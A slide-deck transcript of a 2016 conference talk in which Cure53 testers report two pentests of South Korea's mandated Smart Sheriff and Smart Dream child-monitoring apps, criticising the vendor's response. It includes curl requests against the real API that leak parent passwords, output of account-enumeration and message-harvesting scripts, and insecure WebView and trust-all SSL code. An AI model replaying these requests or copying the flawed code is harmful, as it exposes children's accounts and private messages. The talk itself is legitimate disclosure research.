SlideShare a Scribd company logo

[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea. The wild west of government assisted parenting

PROIDEA
PROIDEA

Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games? Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring! Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then? We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right? Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.

Technology
1 of 90
Download to read offline
Smart Sheriff,
Smart Sheriff, Dumb Idea
Smart Sheriff, Dumb Idea The wild west of government assisted parenting presented by: Abraham Aranguren - @7a_ Fabian Fäßler - @Samuirai
We talk about an app • Background Information • Smart Sheriff - 1. Pentest Round • Smart Sheriff - 2. Pentest Round • Results • Smart Dream • Future work „In the end we hope you share our disbelieve“
Who are we? Abraham Aranguren (@7a_) - blog.7-a.org OWASP OWTF Project leader - owtf.org abraham@cure53.de Fabian Fäßler (@samuirai) - smrrd.de fabian@cure53.de Cure53 is led by handsome Mario Heiderich (@0x6D6172696F). Bullshit free pentests, sometimes public  https://cure53.de/#publications
Once upon a time… … in a country far far away.
South Korea – Smartphone Usage % Total population % 18-34 y/o population Source: Spring 2015 Global Attitudes survey. Q71 & Q72. … the country with the highest Smartphone usage on the planet!
South Korea – Child Protection Laws Article 32, Section 7 of Korean Telecommunications Business Act mobile network operators have to provide adult content filtering service for legal minors … Introduced 15.10.2014
Article 32, Section 7 of Korean Telecommunications Business Act mobile network operators have to provide adult content filtering service for legal minors … Introduced 15.10.2014 Introduced 14.04.2015 Implementation Details Article 37, Section 8 Notify children and parents about features of the blocking Monthly notification if the blocking means was deleted or had not been operated for more than 15 days … South Korea – Child Protection Laws
South Korea – Mandatory apps Mandatory installation of a surveilance app when the phone is purchased for a teenager.
South Korea – Mandatory apps Mandatory installation of a surveilance app when the phone is purchased for a teenager. No opt-out.
South Korea – Mandatory apps Photo: Lee Jin-man/Associated Press
Mobile Internet Business Association (MOIBA) The Korean Communications Commission (KCC) gave MOIBA USD $2.7 million to create these mandatory apps
Why did we do this? OpenNet Korea brought this to Citizen Lab http://opennetkorea.org/ Citizen Lab, Toronto "Citizen Lab Summer Institute on Monitoring Internet Openness and Rights 2015“ http://citizenlab.org/ Open Technology Fund supported it https://www.opentech.fund/
MOIBA - Smart Sheriff / Smart Dream MOIBA created 2 mobile apps Smart Sheriff Smart Dream (Nightmare?) Scope Out of scope Smartphone usage restrictions. Block apps. Usage time restrictions. SMS/Chat and search monitoring for bad keywords. Security: why do you think are we here? Security: wait till the end
Smart Sheriff: Parent vs. Child mode Parent Child • Operating mode chosen on first usage • Parent-Mode: Smartphone usage management • Child-Mode: For filtering and activity monitoring
Smart Sheriff: Block phone access Parents can deny phone access for certain times for the child
Smart Sheriff: Installed apps See installed apps on child’s phone and deny or enable access to them.
Round 1 – Preparations
Language Barrier WTF DOES THIS?
Language Barrier unpack, translate, repack with apktool http://ibotpeaches.github.io/Apktool/
Language Barrier unpack, translate, repack with apktool http://ibotpeaches.github.io/Apktool/
Language Barrier
move-result-object v0 const-string v1, "SAMU" invoke-static {v1, v0}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I private static final String TAG = "SAMU"; Log.i(TAG, result); Patching debug messages in smali code for easy debugging Debugging Need opcodes? http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
Round 1 – Shoot
String url = "http://ssweb.moiba.or.kr/pushAlarm"; WebView webview = (WebView)findViewById(0x7f070000); webview.getSettings().setJavaScriptEnabled(true); webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); webview.postUrl(url, obj); var String = window.jsinterface.getSomeString(); // window.jsinterface.getClass().forName('java.lang.Runtime') RCE with insecure WebView Accessing Java methods from JavaScript in Android 2.4 to 4.1 SMS-01-001 https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614 https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
String url = "http://ssweb.moiba.or.kr/pushAlarm"; WebView webview = (WebView)findViewById(0x7f070000); webview.getSettings().setJavaScriptEnabled(true); webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); webview.postUrl(url, obj); What is SSL? SMS-01-003
String url = "http://ssweb.moiba.or.kr/pushAlarm"; WebView webview = (WebView)findViewById(0x7f070000); webview.getSettings().setJavaScriptEnabled(true); webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); webview.postUrl(url, obj); What is SSL? SMS-01-003
moibagtwigsystemsfightinghhhkkkkok SMS-01-005 "]5ZWSVAB5]" "05555215554"
moibagtwigsystemsfightinghhhkkkkok SMS-01-005 "]5ZWSVAB5]" "05555215554" XOR Key: mx00oibagtwx00igsystex00msfightx00inghhhkx00kkkok
SMS-01-018 STORY TIME!
SMS-01-018
SMS-01-018
Smart Sheriff – Bully API SMS-01-018 API
Smart Sheriff – Bully API SMS-01-018 API
Smart Sheriff – Bully API SMS-01-018 API
Smart Sheriff – Bully API SMS-01-018 API
Smart Sheriff – Bully API SMS-01-018 API API response with the password (XORed)
Smart Sheriff – Bully API - Pass Leak SMS-01-018 root@redstar-os $ curl -v -s 'http://api.moiba.or.kr/MessageRequest --data '{ "action":"CLT_MBR_GETCLIENTMEMBERINFO", "MOBILE_MACHINE_INFO":"XXX", "MOBILE":"5ZWSVAA5[", "DEVICE_ID":"unknown" }' > POST /MessageRequest HTTP/1.1 > Host: api.moiba.or.kr > User-Agent: curl/7.48.0 > Accept: */* > Content-Length: 141 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 141 out of 141 bytes < HTTP/1.1 200 OK < Date: Sun, 15 Oct 2015 17:05:20 GMT < Server: Apache/2.0.65 (Unix) DAV/2 mod_jk/1.2.37 < Content-Length: 242 < Content-Type: text/plain; charset=euc-kr < {"CHILD_GRADE_TYPE":"","CHILD_BIR_YMD":"","MEMBER_YN":"Y","CHILD_BLCK_GRADE":"","PASSWORD":"2]" ,"PARENT_MOBILE":"5ZWSVAA5[","REGISTRATION_ID":"","DIVN":"PARENT"} 2] 1234 5ZWSVAA5[15555215652
Smart Sheriff – Bully API SMS-01-018 Smart sheriff has so many users, you can find valid phone numbers by just trying random numbers. root@redstar-os $ python sheriff_raid.py CHILD : 010XXXXXXXX - pw: 0879 -> parent number: 010XXXXXXXX CHILD : 010XXXXXXXX - pw: 8493 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 8493 PARENT : 010XXXXXXXX - pw: 0878 CHILD : 010XXXXXXXX - pw: 0878 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 2580 CHILD : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX CHILD : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 5912 CHILD : 010XXXXXXXX - pw: 1004 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 1004
Smart Sheriff – Bully API - Fake usage SMS-01-018 API No authentication for the child application. There is a DEVICE_ID as session cookie, but most API endpoints simply accept the phone number to perform updates.
Why not? – HTTP Response for Login root@redstar-os $ curl -X POST http://ssweb.moiba.or.kr/main/ajaxLoginConfirm --data "PNAME=1234&LINKGBN=&PARENTNUM=0102222222" <script type="text/javascript"> function fn_goMain() { if ($("#LINKGBN").val() == "NOTICE") { $("#frmCont").attr("action","/board/boardList"); } else { $("#frmCont").attr("action","/main/childList"); } $("#frmCont").submit(); } // add by his function fn_goPasswordChange() { $("#frmCont").attr("action","/main/passwordChange"); $("#frmCont").submit(); } if('3' < 5){ alert('3회 비밀번호를 잘못 입력하셨습니다.n하단의 ‘비밀번호 찾기’를 클릭하세요.'); }else{ alert('비밀번호 5회 이상 오류로 로그인이 제한됩니다.n고객센터로 문의해주세요(1566-8274)'); } $("#PARENT").attr("disabled", false); $("#INPUTP").attr("disabled", false); </script> AJAX login response returns HTML <script> tag instead of JSON, XML, ... because … why not?
Why not? – Tomcat 6.0.29 (released 2009)
Why not? – Block websites function shouldOverrideUrlLoading()… if(s.startsWith("market://") || s.startsWith("tel:") || s.startsWith("http") && !s.contains("ssweb.moiba.or.kr")) SMS-01-002 blocked allowed :D http://blocked.com http://blocked.com/?blah=ssweb.moiba.or.kr
Test and dev. snippets everywhere {"a1":"!@#$%^&*()_+","a2":"/","a3":"","a4":""","a5":"''''" ,"a6":"aaa한글 테스트 ....aaa"} http://api.moiba.or.kr/test/ http://api.moiba.or.kr/aaa/ http://api.moiba.or.kr/aaa2/ … Test URLs:
Big pile of • XSS • Unsafe storage of block history on SD card • Leaking personal data over the API • SQL Injection in mobile app • … Seriously: https://cure53.de/pentest-report_smartsheriff.pdf
CitizenLab approaches MOIBA • We gave our report to CitizenLab • CitizenLab was in contact with MOIBA • MOIBA made some legal threats in the beginning ⇒ Responsible Disclosure
MOIBA Press Release 1
MOIBA Press Release 2
Citizen Lab publishes the report
Some media attention … but reaction was a bit underwhelming
„Thanks for the free pentest!“ It kinda backfired… Did we just help improving surveilance software?
Round 2
Fixed Stuff • SMS-01-002 Possible Filter-Bypass via unsafe URL check • SMS-01-003 No use of any SSL/TLS-based transport security • SMS-01-004 Test-Page leaks Data and App-Internals • SMS-01-008 Reflected XSS on ssweb.moiba.or.kr
Smart Sheriff – How to SSL like a man SMS-02-008 public final void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler, SslError paramSslError) { paramSslErrorHandler.proceed(); } implements HostnameVerifier { public final boolean verify(String paramString, SSLSession paramSSLSession) { return true; }
Smart Sheriff – Bully API v2.0 SMS-02-009 http://api.moiba.or.kr/MessageRequest https://api.moiba.or.kr/MessageRequest_New • New endpoint introduced • Old endpoint never deprecated – MOIBA lied
"+yld3N...aVIjqteA==„ { "action":"CLT_MBR_GETCL... "MOBILE":".3ZP[QVDC6]UK@JC", "DEVICE_ID: ... } moiba1cybar8smart4sheriff4securi SMS-01-012
"+yld3N...aVIjqteA==„ { "action":"CLT_MBR_GETCL... "MOBILE":".3ZP[QVDC6]UK@JC", "DEVICE_ID: ... } moiba1cybar8smart4sheriff4securi SMS-01-012
Smart Sheriff – Bully API SMS-02-009 API Guess what happened using a different User Agent :D
SMS-02-010 API No authentication for the child application. You can still fake the phone usage (kid installs p0rn app) Smart Sheriff – Bully API v2.0
• They fixed what matters to them (Internal Dev Leaks) • They did not fix what affected their user (Information leaks, no authentication) Seriously: https://cure53.de/pentest-report_smartsheriff-2.pdf Round 2 - Summary
Citizen Lab publishes updated report
MOIBA reacts and pulls the app
News about the app removal
Time to celebrate!
But something is shady…
Did we fail?
Find the difference! 사이버안심존 (Cyber Safety Zone) 스마트보안관 (Smart Sheriff)
The old MOIBA
The new MOIBA
The new MOIBA
The new MOIBA – Login for Parents Smart Sheriff / Cyber Safety Zone Smart Dream
Web Interface – Cyber Safety Zone
Web Interface – Cyber Safety Zone
Smart Sheriff / Cyber Safety Zone • MOIBA didn‘t deprecate the API • MOIBA renamed the app • MOIBA is trying to hide the issues But what is up with Smart Dream?
Web Interface – Smart Dream
Smart Dream Nightmare Parent Child • Parent-Mode: Check messages and searches containing dangerous words • Child-Mode: Monitoring SMS/KakaoTalk and google searches. installs as accessibility service
Smart Dream Nightmare Parent App monitoring SMS Parent Web Backend
Responsible Disclosure? • MOIBA lied to customers about security fixes. • Simply rebranding Smart Sheriff (still vulnerable) - And our reports are public • How can we protect the privacy of the children when MOIBA doesn‘t fix anything when disclosed in private? ⇒ We will not disclose technical details. Any research was done with our own test accounts.
Smart Dream Nightmare XSS via stored messages
+600k Messages from +48k Children root@redstar-os $ python nightmare.py ### Messages from Child: From: ".인터넷" (5) 1. [KakaoTalk] (violence/gang up): "투명성성인기회" 2. [KakaoTalk] (blackmail/money): "깡패?" 3. [KakaoTalk] (violence/맞다): "한!!국교!!„ 4. [KakaoTalk] (blackmail/빌려달라): "보안어린이개방성사랑정?" 5. [KakaoTalk] (threat/kill): "성인성인괴상한해킹비밀한국성인강남스타일모바일„ From: ".사이버억압♡" (2) 1. [KakaoTalk] (rant/crazy girl acting as child): "투명♥♥" 2. [KakaoTalk] (abuse/fuck it): "비 밀사 이버비?밀번역 조 화정부 기 회개인 성 인 어린이정 ..." From: "010XXXXXXXX" (3) 1. [SMS] (harass/desperate): "어린이강남스?타일인터넷" 2. [SMS] (harass/): "깡패구글괴상한" 3. [SMS] (harass/desperate): "부패교육감?" From: ".사이버투♥" (3) 1. [KakaoTalk] (threat/kill): "해킹 평등" 2. [KakaoTalk] (harass/desperate): "자 기 검열보?" 3. [KakaoTalk] (violence/gang up): "강남스타일!!!"
The Most Offensive Slide :O The 1086 "harmful" words that are monitored by smart dream
Another big pile of • XSS • Lack of Authentication and Authorization • Accessing stored messages and searches • …
• Take a step back • Imagine these apps were magically 100% secure • Would you trust any company or government... • ... to have a database with all that information? A note for reflexion
If you know Korean Security Researchers, Journalists or Activists, raise awareness. → Korean society has to deal with these issues Have a look at the other child protection applications and relay results to human rights organizations. → perfect project for a university class Support organizations like OpenNet Korea, CitizenLab, Open Technology Fund, EFF, … What‘s next?
I‘ve learned how virtualization works, by hiding p0rn inside VMWare in early 2000s (and never got busted).
Questions/Comments?
Other Korean Child Protection Apps • SKTelecom: https://play.google.com/store/apps/details?id=com.skt.thug .hazard&hl=ko • KT Corporation: https://play.google.com/store/apps/details?id=com.kt.olleh kidsafe&hl=ko • LG U+: https://play.google.com/store/apps/details?id=com.lguplus. cleanmobile&hl=ko • …
Reports • [20 September 2015] Are the Kids Alright? Digital Risks to Minors from South Korea’s Smart Sheriff Application - https://citizenlab.org/2015/09/digital-risks-south-korea-smart- sheriff/ • [1 November 2015] The Kids are Still at Risk: Update to Citizen Lab’s “Are the Kids Alright?” Smart Sheriff report - https://citizenlab.org/2015/11/smart-sheriff-update/ • [21 September 2015] Submission to the 113th Session of the UN Human Rights Committee for Fourth Periodic Report of the Republic of Korea - http://opennetkorea.org/en/wp/wp- content/uploads/2016/03/INT_CCPR__KOR_OPEN_NETSmart- Sheriff.pdf
Some News Articles • [19 May 2015] Don’t text ‘beer’ in Korea: Words that trigger teen alerts - http://www.japantimes.co.jp/news/2015/05/19/asia- pacific/dont-text-beer-korea-words-trigger-teen-alerts/ • [16 June 2015] South Korea provokes teenage smartphone privacy row - http://www.bbc.com/news/technology- 33091990 • [21 September 2015] Smart Sheriff child surveillance app leaves South Korean kids vulnerable to hackers - http://www.cbc.ca/news/technology/smart-sheriff- 1.3236682

Recommended

Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...PROIDEA
 
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst [CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst PROIDEA
 
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...PROIDEA
 
[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...
[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...
[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...PROIDEA
 
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...PROIDEA
 
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...PROIDEA
 
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...PROIDEA
 
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadAtmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadPROIDEA
 

Recommended

Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...PROIDEA
 
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst [CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst PROIDEA
 
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...PROIDEA
 
[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...
[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...
[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Micr...PROIDEA
 
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...PROIDEA
 
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...PROIDEA
 
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...PROIDEA
 
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadAtmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadPROIDEA
 
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...PROIDEA
 
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...PROIDEA
 
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz][4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]PROIDEA
 
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...PROIDEA
 
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...PROIDEA
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...PROIDEA
 
[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)PROIDEA
 
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...PROIDEA
 
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)PROIDEA
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 
All your family secrets belong to us—Worrisome security issues in tracker apps
All your family secrets belong to us—Worrisome security issues in tracker appsAll your family secrets belong to us—Worrisome security issues in tracker apps
All your family secrets belong to us—Worrisome security issues in tracker appsPriyanka Aash
 
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)modeelf
 
Our Data Ourselves, Pydata 2015
Our Data Ourselves, Pydata 2015Our Data Ourselves, Pydata 2015
Our Data Ourselves, Pydata 2015kingsBSD
 
Cyber safety
Cyber safetyCyber safety
Cyber safetyArjun Chetry
 
Jorden Lentze - Related Worlds - Conversion Hotel 2015
Jorden Lentze - Related Worlds - Conversion Hotel 2015Jorden Lentze - Related Worlds - Conversion Hotel 2015
Jorden Lentze - Related Worlds - Conversion Hotel 2015Webanalisten .nl
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 
Mobile Securty - An Oxymoron?
Mobile Securty - An Oxymoron?Mobile Securty - An Oxymoron?
Mobile Securty - An Oxymoron?morisson
 
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...Allison Miller
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinreconvillage
 
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...RootedCON
 
SplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunk
 

More Related Content

Viewers also liked

MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...PROIDEA
 
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...PROIDEA
 
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz][4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]PROIDEA
 
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...PROIDEA
 
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...PROIDEA
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...PROIDEA
 
[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)PROIDEA
 
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...PROIDEA
 
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)PROIDEA
 

Viewers also liked (9)

MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
 
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
